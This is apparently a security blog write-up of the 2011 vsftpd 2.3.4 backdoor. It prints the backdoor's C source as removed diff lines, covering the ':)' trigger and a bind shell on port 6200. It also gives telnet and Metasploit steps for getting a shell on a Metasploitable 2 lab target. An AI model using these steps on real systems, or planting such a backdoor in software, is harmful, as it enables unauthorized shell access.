---
layout: post
title:  "VSFTPD 2.3.4"
categories: [Technical]
tags: [backdoor, exploit, python]
---

### Introduction

Between June 30th - July 1st 2011 a backdoor was introduced into the vsftpd-2.3.4.tar.gz archive this backdoor allowed an attacker to get a bind shell to the system and thus compromising the system. Although the backdoor was removed quickly (July 3rd 2011) a lot of people downloaded this vulnerable version of VSFTPD, causing quite a lot of panic for sysadmins.

### So, how does it work?

In general, it's actually a pretty simple exploit, and whilst there is a Metasploit module you really don't need to use it. The backdoor payload is initiated in response to a user sending `:)` to the server upon being prompted for a username, by sending that smiley face to the server it executes a function which opens a bind shell listener on port 6200 of the affected device.

### Code Review

```
-    else if((p_str->p_buf[i]==0x3a)
-    && (p_str->p_buf[i+1]==0x29))
-    {
-      vsf_sysutil_extra();
-    }
```

As you can see in the above code, we're checking if some input is equal to a certain value, to be specific, we're checking if the user input is equal to `0x3a` and `0x29` if this is true then we're executing `vsf_sysutil_extra();` a quick Google on `0x3a` tells you it's a `:` and a further Google on `0x29` shows a `)` so as you can see there is the smiley face. So, now we know that we have this special input, let's look at the `vsf_sysutil_extra();` function as right now we don't have anything that resembles a vulnerability.

```
-int
-vsf_sysutil_extra(void)
-{
-  int fd, rfd;
-  struct sockaddr_in sa;
-  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
-  exit(1);
-  memset(&sa, 0, sizeof(sa));
-  sa.sin_family = AF_INET;
-  sa.sin_port = htons(6200);
-  sa.sin_addr.s_addr = INADDR_ANY;
-  if((bind(fd,(struct sockaddr *)&sa,
-  sizeof(struct sockaddr))) < 0) exit(1);
-  if((listen(fd, 100)) == -1) exit(1);
-  for(;;)
-  {
-    rfd = accept(fd, 0, 0);
-    close(0); close(1); close(2);
-    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
-    execl("/bin/sh","sh",(char *)0);
-  }
-}
-
-
```

As you can see above, we're creating a bind socket and setting up a listener process on that socket. We're opening this socket on port 6200 and that is where the vulnerability lies, because we can now connect to this socket without *any* authentication process taking place.

### Exploit

As I mentioned earlier we can exploit this using the Metasploit module `exploit/unix/ftp/vsftpd_234_backdoor` however, we can carry out this exploit manually fairly easily, we will look at both methods in this post.

It's worth noting for the below exploitation examples I am using [Metasploitable 2](https://metasploit.help.rapid7.com/docs/metasploitable-2)

#### Manual Exploitation

Firstly, let's telnet to our affected device on port 21 using `telnet ip port` once we do that we'll be asked for a username & password, let's use `:)` as the username & `pass` as the password. If we wait a few seconds then port 6200 should be opened, you can also manually escape with `^]` but waiting also works.

Now if we run an nmap scan our target we should see that port 6200 is open, we can now use `telnet ip port` again and that's it! We now have shell access, if the service was running on a root account in a network we'd now have a root account in that network, simple, right? 


#### Metasploit Exploitation

As I mentioned, we can use the Metasploit module to carry out this attack however I do actually prefer doing it manually, nonetheless, let's get into this. Once again I am using [Metaspolitable 2](https://metasploit.help.rapid7.com/docs/metasploitable-2) as my target.

Start Metasploit using `msfconsole` then run `use exploit/unix/ftp/vsftpd_234_backdoor` now all we need to do is configure the host of the target, if you use `show options` you should see the `RPORT` field is already correct, to set the `RHOST` field use `set rhost ip` then we just type `run` and that's it, the script will carry out the attack for you, with a few exceptions it pretty much just does what you did manually, you can find a link to the Rapid7 page at the bottom of this post. But that's it! That's all we needed to do, now you have a shell.

### Python Exploitation

After browsing the Internet for a while I found this [blog post](https://0x00sec.org/t/re-building-a-vsftpd-backdoor-exploit-in-python/159) which showed an implementation of the Metasploit module in Python. As you can see, this is a Python 2 implementation, so for my own benefit I decided to rewrite the script into Python 3, you can find my Python 3 implementation repo [here](https://github.com/LinxzFade/vsftpd234-Backdoor)


### References

[Rapid7 Metasploit Module](https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor)

[vsftpd 2.3.4 Vulnerable Code](https://pastebin.com/AetT9sS5)

[Metasploit Module Exploit Code](https://www.exploit-db.com/exploits/17491/)

[Python 2 Exploit Implementation](https://0x00sec.org/t/re-building-a-vsftpd-backdoor-exploit-in-python/159)

